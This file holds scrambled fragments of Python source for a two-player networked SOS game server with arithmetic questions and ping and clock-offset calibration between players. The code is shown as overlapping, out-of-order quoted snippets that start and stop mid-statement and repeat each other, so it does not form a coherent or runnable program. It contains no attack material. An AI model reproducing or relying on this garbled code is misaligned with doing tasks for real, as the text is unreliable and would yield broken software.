"False self.calibration_acks = [[], []] self.calibrations = [[{} for _ in range(10)], [{}",
"self.both_players_received: return coordinate_x, coordinate_y, character = move self.calculate_score(id, coordinate_x, coordinate_y, character) self.generate_question() self.notify_players()",
"return else: return time.sleep(0.2) with self.lock: if self.game.question_uuid != uuid: return if self.receive_question_ts[1",
"= sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) / 6 ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"])",
"1 if self.active_connections[0] == None: id = 0 self.active_connections[id] = conn return id",
"id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received = True print(\"Both player has received the",
"2): for direction in directions: sequence = \"\" sequence_coordinates = [] for i",
"[None, None] self.game = Game(4, 4) self.lock = threading.Lock() self.receive_question_ts = [None, None]",
"id): if self.game.state == GameState.QUESTION: self.ts_info[id][self.game.question_uuid] = {} self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time() conn.sendall(pickle.dumps(self.game) +",
"import json import sys import random import uuid import time sys.path.append('..') from game",
"6 ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) / 6 print(\"Player",
"1000, \" ms\") print(\"Player 1 has a ping: \", ping1 * 1000, \"",
"self.lock: self.received_acks_cnt[id] += 1 if self.received_acks_cnt[id] == 10 and self.received_acks_cnt[1 - id] ==",
"6 print(\"Player 0 has a ping: \", ping0 * 1000, \" ms\") print(\"Player",
"random import uuid import time sys.path.append('..') from game import Game, GameState from utils",
"self.lock: self.game.reset_board() self.generate_question() self.notify_players() def enter_name(self, id, name): ready = False def calibrate_timestamps(self):",
"self.game.state == GameState.QUESTION: self.ts_info[id][self.game.question_uuid] = {} self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time() conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD) for",
"True if ready: threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start() def notify_players(self): print(\"Sending Game information to the",
"< 0 or sequence_coordinates[-1][1] < 0 or \\ sequence_coordinates[-1][0] >= self.game.row or sequence_coordinates[-1][1]",
"in range(10): for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx,",
"self.answer_ts[id]: self.game.turn = 1 - id else: self.game.turn = id self.notify_players() # Returns",
"+= self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence == \"SOS\" and sequence_coordinates not in self.game.complete_lines: self.game.scores[id] +=",
"import uuid import time sys.path.append('..') from game import Game, GameState from utils import",
"question self.game.answer = answer self.game.question_uuid = str(uuid.uuid4()) self.receive_question_ts = [None, None] self.both_players_received =",
"self.game.state != GameState.MOVE or self.game.turn != id: # or not self.both_players_received: return coordinate_x,",
"- 1) * direction[0], y - (i - 1) * direction[1]]) if sequence_coordinates[-1][0]",
"client_send with self.lock: if self.game.state != GameState.QUESTION: return if self.game.question_uuid == uuid: self.receive_question_ts[id]",
"{ \"TYPE\": \"ID\", \"PAYLOAD\": id } print(f\"Sending ID to the Player {id}\") conn.sendall(string_to_byte(json.dumps(message))",
"daemon=True).start() def notify_players(self): print(\"Sending Game information to the all players\") def connection_thread(self, conn,",
"Question: \" + question + \" / UUID: \" + self.game.question_uuid) def send_id(self,",
"coordinate[1]) def move(self, id, move): with self.lock: if self.game.state != GameState.MOVE or self.game.turn",
"time.time() self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts self.calibrations[id][ack_id][\"client_send\"] = client_send_ts ready_to_start = False with self.lock: self.received_acks_cnt[id]",
"self.calibrations[0] = self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] = self.calibrations[1][1:] self.update_time_difference() def update_time_difference(self): ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"])",
"with self.lock: if self.game.state != GameState.QUESTION or self.game.question_uuid != question_uuid: return self.answer_ts[id] =",
"<= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player has received the question \" + uuid) self.both_players_received =",
"a ping: \", ping0 * 1000, \" ms\") print(\"Player 1 has a ping:",
"abs(self.receive_question_ts[0] - self.receive_question_ts[1] - self.ts_difference - self.ping_difference) def check_question_ack(self, id, client_rec, client_send, uuid):",
"restart_game(self): with self.lock: self.game.reset_board() self.generate_question() self.notify_players() def enter_name(self, id, name): ready = False",
"or \\ sequence_coordinates[-1][0] >= self.game.row or sequence_coordinates[-1][1] >= self.game.col: sequence = \"NOO\" break",
"def connection_thread(self, conn, id): if self.game.state == GameState.QUESTION: self.ts_info[id][self.game.question_uuid] = {} self.ts_info[id][self.game.question_uuid][\"server_send\"] =",
"self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] = self.calibrations[1][1:] self.update_time_difference() def update_time_difference(self): ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2",
"to the Player {id}\") conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD) def close_connections(self): for conn in self.active_connections:",
"or not self.both_players_received: return coordinate_x, coordinate_y, character = move self.calculate_score(id, coordinate_x, coordinate_y, character)",
"= 0 self.active_connections[id] = conn return id def remove_player(self, id): with self.lock: self.active_connections[id]",
"def update_time_difference(self): ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) / 6",
"ready: threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start() def notify_players(self): print(\"Sending Game information to the all players\")",
"= self.active_connections[id] message = { \"TYPE\": \"ID\", \"PAYLOAD\": id } print(f\"Sending ID to",
"+ 2): for y in range(coordinate_y - 1, coordinate_y + 2): for direction",
"!= question_uuid: return self.answer_ts[id] = duration if self.answer_ts[1 - id]: return if not",
"y in range(coordinate_y - 1, coordinate_y + 2): for direction in directions: sequence",
"difference in seconds is: \", self.ts_difference) def add_calibration_ack(self, id, client_rec_ts, client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"]",
"= random.choice(operator_list) limit = 20 if operator == \"*\" else 100 number_1 =",
"1) * direction[1]]) if sequence_coordinates[-1][0] < 0 or sequence_coordinates[-1][1] < 0 or \\",
"[max(0, -self.ping_difference), max(0, self.ping_difference)] delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]])",
"with self.lock: self.game.board[coordinate_x][coordinate_y] = character for x in range(coordinate_x - 1, coordinate_x +",
"self.SPECIAL_KEYWORD) def close_connections(self): for conn in self.active_connections: if conn: conn.close() def calculate_score(self, id,",
"delta0 - delta1 print(\"Calculated time difference in seconds is: \", self.ts_difference) def add_calibration_ack(self,",
"if ready: threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start() def notify_players(self): print(\"Sending Game information to the all",
"self.calibrations[1] = self.calibrations[1][1:] self.update_time_difference() def update_time_difference(self): ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c",
"coordinate_x, coordinate_y, character): directions = [[-1, 0], [-1, -1], [0, -1], [1, -1]]",
"with self.lock: if self.game.state != GameState.QUESTION: return if self.game.question_uuid == uuid: self.receive_question_ts[id] =",
"/ UUID: \" + self.game.question_uuid) def send_id(self, id): conn = self.active_connections[id] message =",
"None] self.both_players_received = False self.calibration_acks = [[], []] self.calibrations = [[{} for _",
"\", ping0 * 1000, \" ms\") print(\"Player 1 has a ping: \", ping1",
"GameState from utils import string_to_byte, byte_to_string class GameController(): SPECIAL_KEYWORD = b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE =",
"= 1 - id else: self.game.turn = id self.notify_players() # Returns the normalized",
"if self.active_connections[0] == None: id = 0 self.active_connections[id] = conn return id def",
"for x in range(coordinate_x - 1, coordinate_x + 2): for y in range(coordinate_y",
"import pickle import json import sys import random import uuid import time sys.path.append('..')",
"if self.game.state != GameState.QUESTION: return if self.game.question_uuid == uuid: self.receive_question_ts[id] = client_rec if",
"ready = True if ready: threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start() def notify_players(self): print(\"Sending Game information",
"- id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player has received the question \"",
"= False with self.lock: self.received_acks_cnt[id] += 1 if self.received_acks_cnt[id] == 10 and self.received_acks_cnt[1",
"id, coordinate_x, coordinate_y, character): directions = [[-1, 0], [-1, -1], [0, -1], [1,",
"if sequence_coordinates[-1][0] < 0 or sequence_coordinates[-1][1] < 0 or \\ sequence_coordinates[-1][0] >= self.game.row",
"enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx, i), daemon=True).start() time.sleep(0.2) with self.lock: self.game.players_names[id]",
"return if self.game.question_uuid == uuid: self.receive_question_ts[id] = client_rec if self.receive_question_ts[1 - id]: if",
"[0, 0] self.ping_difference = 0 self.ts_info = [{}, {}] self.answer_ts = [None, None]",
"give_turn(self, id, question_uuid, duration): print(f\"Player {id} duration: {duration} seconds\") with self.lock: if self.game.state",
"ready_to_start = False with self.lock: self.received_acks_cnt[id] += 1 if self.received_acks_cnt[id] == 10 and",
"self.active_connections[0] == None: id = 0 self.active_connections[id] = conn return id def remove_player(self,",
"has received the question \" + uuid) self.both_players_received = True return else: return",
"self.ts_difference) def add_calibration_ack(self, id, client_rec_ts, client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"] = time.time() self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts",
"import time sys.path.append('..') from game import Game, GameState from utils import string_to_byte, byte_to_string",
"if operator == \"*\" else 100 number_1 = random.randint(1, limit) number_2 = random.randint(1,",
"uuid): self.ts_info[id][uuid][\"server_rec\"] = time.time() self.ts_info[id][uuid][\"client_rec\"] = client_rec self.ts_info[id][uuid][\"client_send\"] = client_send with self.lock: if",
"has a ping: \", ping1 * 1000, \" ms\") self.ping_difference = ping0 -",
"self.game.marked_boxes.add(coordinate[0] * self.game.col + coordinate[1]) def move(self, id, move): with self.lock: if self.game.state",
"return self.answer_ts[id] = duration if self.answer_ts[1 - id]: return if not self.answer_ts[1 -",
"- 1, coordinate_y + 2): for direction in directions: sequence = \"\" sequence_coordinates",
"self.notify_players() def give_turn(self, id, question_uuid, duration): print(f\"Player {id} duration: {duration} seconds\") with self.lock:",
"answer = str(eval(question)) with self.lock: self.game.state = GameState.QUESTION self.game.question = question self.game.answer =",
"else 100 number_1 = random.randint(1, limit) number_2 = random.randint(1, limit) question = str(number_1)",
"self.both_players_received = False self.answer_ts = [None, None] print(\"Generated the Question: \" + question",
"/ 2 for c in self.calibrations[0][-6:]]) / 6 ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2",
"def move(self, id, move): with self.lock: if self.game.state != GameState.MOVE or self.game.turn !=",
"players in seconds. def get_timestamp_diff(self): return abs(self.receive_question_ts[0] - self.receive_question_ts[1] - self.ts_difference - self.ping_difference)",
"self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] = self.calibrations[1][1:] self.update_time_difference() def update_time_difference(self): ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for",
"New Question...\") operator_list = [\"+\", \"-\", \"*\"] operator = random.choice(operator_list) limit = 20",
"move self.calculate_score(id, coordinate_x, coordinate_y, character) self.generate_question() self.notify_players() def give_turn(self, id, question_uuid, duration): print(f\"Player",
"for _ in range(10)]] self.ts_difference = 0 self.received_acks_cnt = [0, 0] self.ping_difference =",
"id = 1 if self.active_connections[0] == None: id = 0 self.active_connections[id] = conn",
"get_timestamp_diff(self): return abs(self.receive_question_ts[0] - self.receive_question_ts[1] - self.ts_difference - self.ping_difference) def check_question_ack(self, id, client_rec,",
"delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) / 6 self.ts_difference =",
"1 if self.received_acks_cnt[id] == 10 and self.received_acks_cnt[1 - id] == 10: self.update_time_difference() ready_to_start",
"in seconds def __init__(self): self.active_connections = [None, None] self.game = Game(4, 4) self.lock",
"with self.lock: self.game.players_names[id] = name self.send_id(id) if self.game.players_names[1 - id] != None: ready",
"question_uuid: return self.answer_ts[id] = duration if self.answer_ts[1 - id]: return if not self.answer_ts[1",
"[None, None] self.both_players_received = False self.calibration_acks = [[], []] self.calibrations = [[{} for",
"(i - 1) * direction[1]]) if sequence_coordinates[-1][0] < 0 or sequence_coordinates[-1][1] < 0",
"\"PAYLOAD\": id } print(f\"Sending ID to the Player {id}\") conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD) def",
"= str(eval(question)) with self.lock: self.game.state = GameState.QUESTION self.game.question = question self.game.answer = answer",
"normalized timestamp difference between acknowledgment of two players in seconds. def get_timestamp_diff(self): return",
"for i in range(3): sequence_coordinates.append([x - (i - 1) * direction[0], y -",
"= client_rec self.ts_info[id][uuid][\"client_send\"] = client_send with self.lock: if self.game.state != GameState.QUESTION: return if",
"max(0, self.ping_difference)] delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) / 6",
"0 and 1. self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.ts_info = [{},",
"- delta1 print(\"Calculated time difference in seconds is: \", self.ts_difference) def add_calibration_ack(self, id,",
"self.game.state != GameState.QUESTION or self.game.question_uuid != question_uuid: return self.answer_ts[id] = duration if self.answer_ts[1",
"i in range(10): for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn,",
"= [None, None] def add_connection(self, conn): id = 1 if self.active_connections[0] == None:",
"coordinate_y + 2): for direction in directions: sequence = \"\" sequence_coordinates = []",
"/ 6 ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) / 6",
"ping: \", ping0 * 1000, \" ms\") print(\"Player 1 has a ping: \",",
"\" + uuid) self.both_players_received = True return else: return else: return time.sleep(0.2) with",
"client_rec_ts, client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"] = time.time() self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts self.calibrations[id][ack_id][\"client_send\"] = client_send_ts ready_to_start",
"= False self.calibration_acks = [[], []] self.calibrations = [[{} for _ in range(10)],",
"[{} for _ in range(10)]] self.ts_difference = 0 self.received_acks_cnt = [0, 0] self.ping_difference",
"coordinate_y, character) self.generate_question() self.notify_players() def give_turn(self, id, question_uuid, duration): print(f\"Player {id} duration: {duration}",
"0 self.ts_info = [{}, {}] self.answer_ts = [None, None] def add_connection(self, conn): id",
"!= GameState.QUESTION: return if self.game.question_uuid == uuid: self.receive_question_ts[id] = client_rec if self.receive_question_ts[1 -",
"[\"+\", \"-\", \"*\"] operator = random.choice(operator_list) limit = 20 if operator == \"*\"",
"self.game.complete_lines: self.game.scores[id] += 1 self.game.complete_lines.append(sequence_coordinates) for coordinate in sequence_coordinates: self.game.marked_boxes.add(coordinate[0] * self.game.col +",
"= False self.answer_ts = [None, None] print(\"Generated the Question: \" + question +",
"\" ms\") self.ping_difference = ping0 - ping1 self.game.wait_times = [max(0, -self.ping_difference), max(0, self.ping_difference)]",
"not self.both_players_received: return coordinate_x, coordinate_y, character = move self.calculate_score(id, coordinate_x, coordinate_y, character) self.generate_question()",
"- 1, coordinate_x + 2): for y in range(coordinate_y - 1, coordinate_y +",
"self.answer_ts[1-id] < self.answer_ts[id]: self.game.turn = 1 - id else: self.game.turn = id self.notify_players()",
"= True return else: return else: return time.sleep(0.2) with self.lock: if self.game.question_uuid !=",
"for coordinate in sequence_coordinates: self.game.marked_boxes.add(coordinate[0] * self.game.col + coordinate[1]) def move(self, id, move):",
"id, move): with self.lock: if self.game.state != GameState.MOVE or self.game.turn != id: #",
"b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE = 0.010 # in seconds def __init__(self): self.active_connections = [None, None]",
"= [None, None] self.both_players_received = False self.answer_ts = [None, None] print(\"Generated the Question:",
"= \"NOO\" break sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence == \"SOS\" and sequence_coordinates not",
"for _ in range(10)], [{} for _ in range(10)]] self.ts_difference = 0 #",
"0 has a ping: \", ping0 * 1000, \" ms\") print(\"Player 1 has",
"self.ts_info = [{}, {}] self.answer_ts = [None, None] def add_connection(self, conn): id =",
"question_uuid, duration): print(f\"Player {id} duration: {duration} seconds\") with self.lock: if self.game.state != GameState.QUESTION",
"self.calibrations[id][ack_id][\"server_rec\"] = time.time() self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts self.calibrations[id][ack_id][\"client_send\"] = client_send_ts ready_to_start = False with",
"json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"] = time.time() conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD) for i in",
"1000, \" ms\") self.ping_difference = ping0 - ping1 self.game.wait_times = [max(0, -self.ping_difference), max(0,",
"GameController(): SPECIAL_KEYWORD = b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE = 0.010 # in seconds def __init__(self): self.active_connections",
"add_connection(self, conn): id = 1 if self.active_connections[0] == None: id = 0 self.active_connections[id]",
"== None: id = 0 self.active_connections[id] = conn return id def remove_player(self, id):",
"conn: threading.Thread(target=connection_thread, args=(self, conn, idx, i), daemon=True).start() time.sleep(0.2) with self.lock: self.game.players_names[id] = name",
"- ping1 self.game.wait_times = [max(0, -self.ping_difference), max(0, self.ping_difference)] delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2",
"# Returns the normalized timestamp difference between acknowledgment of two players in seconds.",
"conn, id): if self.game.state == GameState.QUESTION: self.ts_info[id][self.game.question_uuid] = {} self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time() conn.sendall(pickle.dumps(self.game)",
"GameState.QUESTION: self.ts_info[id][self.game.question_uuid] = {} self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time() conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD) for idx, conn",
"def give_turn(self, id, question_uuid, duration): print(f\"Player {id} duration: {duration} seconds\") with self.lock: if",
"[-1, -1], [0, -1], [1, -1]] with self.lock: self.game.board[coordinate_x][coordinate_y] = character for x",
"\" + uuid) self.add_new_calibration_ts(uuid) return else: self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players() def add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid])",
"coordinate_x + 2): for y in range(coordinate_y - 1, coordinate_y + 2): for",
"character = move self.calculate_score(id, coordinate_x, coordinate_y, character) self.generate_question() self.notify_players() def give_turn(self, id, question_uuid,",
"remove_player(self, id): with self.lock: self.active_connections[id] = None self.game.players_names[id] = None self.game.reset_board() self.calibration_acks =",
"time.time() conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD) for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self,",
"self.calibrations = [[{} for _ in range(10)], [{} for _ in range(10)]] self.ts_difference",
"self.game.turn != id: # or not self.both_players_received: return coordinate_x, coordinate_y, character = move",
"UUID: \" + self.game.question_uuid) def send_id(self, id): conn = self.active_connections[id] message = {",
"client_rec self.ts_info[id][uuid][\"client_send\"] = client_send with self.lock: if self.game.state != GameState.QUESTION: return if self.game.question_uuid",
"-1], [1, -1]] with self.lock: self.game.board[coordinate_x][coordinate_y] = character for x in range(coordinate_x -",
"generate_question(self): print(\"Generating New Question...\") operator_list = [\"+\", \"-\", \"*\"] operator = random.choice(operator_list) limit",
"+ question + \" / UUID: \" + self.game.question_uuid) def send_id(self, id): conn",
"range(10)], [{} for _ in range(10)]] self.ts_difference = 0 self.received_acks_cnt = [0, 0]",
"_ in range(10)]] self.ts_difference = 0 self.received_acks_cnt = [0, 0] self.ping_difference = 0",
"return abs(self.receive_question_ts[0] - self.receive_question_ts[1] - self.ts_difference - self.ping_difference) def check_question_ack(self, id, client_rec, client_send,",
"- self.ping_difference) def check_question_ack(self, id, client_rec, client_send, uuid): self.ts_info[id][uuid][\"server_rec\"] = time.time() self.ts_info[id][uuid][\"client_rec\"] =",
"random.randint(1, limit) question = str(number_1) + operator + str(number_2) answer = str(eval(question)) with",
"self.ping_difference = ping0 - ping1 self.game.wait_times = [max(0, -self.ping_difference), max(0, self.ping_difference)] delta0 =",
"GameState.QUESTION: return if self.game.question_uuid == uuid: self.receive_question_ts[id] = client_rec if self.receive_question_ts[1 - id]:",
"with self.lock: self.game.state = GameState.QUESTION self.game.question = question self.game.answer = answer self.game.question_uuid =",
"True return else: return else: return time.sleep(0.2) with self.lock: if self.game.question_uuid != uuid:",
"0] self.ping_difference = 0 self.notify_players() def restart_game(self): with self.lock: self.game.reset_board() self.generate_question() self.notify_players() def",
"if self.game.state == GameState.QUESTION: self.ts_info[id][self.game.question_uuid] = {} self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time() conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD)",
"-1], [0, -1], [1, -1]] with self.lock: self.game.board[coordinate_x][coordinate_y] = character for x in",
"\"\" sequence_coordinates = [] for i in range(3): sequence_coordinates.append([x - (i - 1)",
"if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player has received the question \" + uuid)",
"directions: sequence = \"\" sequence_coordinates = [] for i in range(3): sequence_coordinates.append([x -",
">= self.game.col: sequence = \"NOO\" break sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence == \"SOS\"",
"__init__(self): self.active_connections = [None, None] self.game = Game(4, 4) self.lock = threading.Lock() self.receive_question_ts",
"in seconds is: \", self.ts_difference) def add_calibration_ack(self, id, client_rec_ts, client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"] =",
"Average difference between timestamps of player 0 and 1. self.received_acks_cnt = [0, 0]",
"time.sleep(0.2) with self.lock: if self.game.question_uuid != uuid: return if self.receive_question_ts[1 - id]: if",
"self.calibrations[1][-6:]]) / 6 print(\"Player 0 has a ping: \", ping0 * 1000, \"",
"character): directions = [[-1, 0], [-1, -1], [0, -1], [1, -1]] with self.lock:",
"id, i): message = json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"] = time.time() conn.sendall(string_to_byte(message) +",
"for _ in range(10)]] self.ts_difference = 0 # Average difference between timestamps of",
"sequence_coordinates not in self.game.complete_lines: self.game.scores[id] += 1 self.game.complete_lines.append(sequence_coordinates) for coordinate in sequence_coordinates: self.game.marked_boxes.add(coordinate[0]",
"_ in range(10)], [{} for _ in range(10)]] self.ts_difference = 0 # Average",
"self.game.players_names[id] = name self.send_id(id) if self.game.players_names[1 - id] != None: ready = True",
"[None, None] print(\"Generated the Question: \" + question + \" / UUID: \"",
"def get_timestamp_diff(self): return abs(self.receive_question_ts[0] - self.receive_question_ts[1] - self.ts_difference - self.ping_difference) def check_question_ack(self, id,",
"= [0, 0] self.ping_difference = 0 self.notify_players() def restart_game(self): with self.lock: self.game.reset_board() self.generate_question()",
"if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received = True print(\"Both player",
"def enter_name(self, id, name): ready = False def calibrate_timestamps(self): def connection_thread(self, conn, id,",
"question + \" / UUID: \" + self.game.question_uuid) def send_id(self, id): conn =",
"# or not self.both_players_received: return coordinate_x, coordinate_y, character = move self.calculate_score(id, coordinate_x, coordinate_y,",
"ping1 self.game.wait_times = [max(0, -self.ping_difference), max(0, self.ping_difference)] delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for",
"2 for c in self.calibrations[1][-6:]]) / 6 print(\"Player 0 has a ping: \",",
"= json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"] = time.time() conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD) for i",
"client_send, uuid): self.ts_info[id][uuid][\"server_rec\"] = time.time() self.ts_info[id][uuid][\"client_rec\"] = client_rec self.ts_info[id][uuid][\"client_send\"] = client_send with self.lock:",
"id else: self.game.turn = id self.notify_players() # Returns the normalized timestamp difference between",
"acknowledgment of two players in seconds. def get_timestamp_diff(self): return abs(self.receive_question_ts[0] - self.receive_question_ts[1] -",
"self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received = True print(\"Both player has received the question \"",
"self.update_time_difference() def update_time_difference(self): ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) /",
"question = str(number_1) + operator + str(number_2) answer = str(eval(question)) with self.lock: self.game.state",
"difference between acknowledgment of two players in seconds. def get_timestamp_diff(self): return abs(self.receive_question_ts[0] -",
"return else: self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players() def add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] = self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid])",
"in range(coordinate_y - 1, coordinate_y + 2): for direction in directions: sequence =",
"daemon=True).start() time.sleep(0.2) with self.lock: self.game.players_names[id] = name self.send_id(id) if self.game.players_names[1 - id] !=",
"GameState.QUESTION self.game.question = question self.game.answer = answer self.game.question_uuid = str(uuid.uuid4()) self.receive_question_ts = [None,",
"str(i)}) self.calibrations[id][i][\"server_send\"] = time.time() conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD) for i in range(10): for idx,",
"coordinate in sequence_coordinates: self.game.marked_boxes.add(coordinate[0] * self.game.col + coordinate[1]) def move(self, id, move): with",
"id: # or not self.both_players_received: return coordinate_x, coordinate_y, character = move self.calculate_score(id, coordinate_x,",
"calibrate_timestamps(self): def connection_thread(self, conn, id, i): message = json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"]",
"import string_to_byte, byte_to_string class GameController(): SPECIAL_KEYWORD = b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE = 0.010 # in",
"{id}\") conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD) def close_connections(self): for conn in self.active_connections: if conn: conn.close()",
"not in self.game.complete_lines: self.game.scores[id] += 1 self.game.complete_lines.append(sequence_coordinates) for coordinate in sequence_coordinates: self.game.marked_boxes.add(coordinate[0] *",
"self.game.row or sequence_coordinates[-1][1] >= self.game.col: sequence = \"NOO\" break sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if",
"* self.ping_difference)) with self.lock: self.game.state = GameState.MOVE if self.answer_ts[1-id] and self.answer_ts[1-id] < self.answer_ts[id]:",
"if conn: threading.Thread(target=connection_thread, args=(self, conn, idx), daemon=True).start() def generate_question(self): print(\"Generating New Question...\") operator_list",
"id, name): ready = False def calibrate_timestamps(self): def connection_thread(self, conn, id, i): message",
"/ 6 self.ts_difference = delta0 - delta1 print(\"Calculated time difference in seconds is:",
"self.answer_ts[id] = duration if self.answer_ts[1 - id]: return if not self.answer_ts[1 - id]:",
"id, question_uuid, duration): print(f\"Player {id} duration: {duration} seconds\") with self.lock: if self.game.state !=",
"self.lock: self.game.state = GameState.QUESTION self.game.question = question self.game.answer = answer self.game.question_uuid = str(uuid.uuid4())",
"- id] != None: ready = True if ready: threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start() def",
"else: return time.sleep(0.2) with self.lock: if self.game.question_uuid != uuid: return if self.receive_question_ts[1 -",
"[[{} for _ in range(10)], [{} for _ in range(10)]] self.ts_difference = 0",
"conn return id def remove_player(self, id): with self.lock: self.active_connections[id] = None self.game.players_names[id] =",
"0.010 # in seconds def __init__(self): self.active_connections = [None, None] self.game = Game(4,",
"for c in self.calibrations[1][-6:]]) / 6 self.ts_difference = delta0 - delta1 print(\"Calculated time",
"2 for c in self.calibrations[0][-6:]]) / 6 delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for",
"self.lock = threading.Lock() self.receive_question_ts = [None, None] self.both_players_received = False self.calibration_acks = [[],",
"in range(coordinate_x - 1, coordinate_x + 2): for y in range(coordinate_y - 1,",
"id, client_rec_ts, client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"] = time.time() self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts self.calibrations[id][ack_id][\"client_send\"] = client_send_ts",
"Game information to the all players\") def connection_thread(self, conn, id): if self.game.state ==",
"self.game.question_uuid == uuid: self.receive_question_ts[id] = client_rec if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <=",
"conn, id, i): message = json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"] = time.time() conn.sendall(string_to_byte(message)",
"self.calibrations[id][i][\"server_send\"] = time.time() conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD) for i in range(10): for idx, conn",
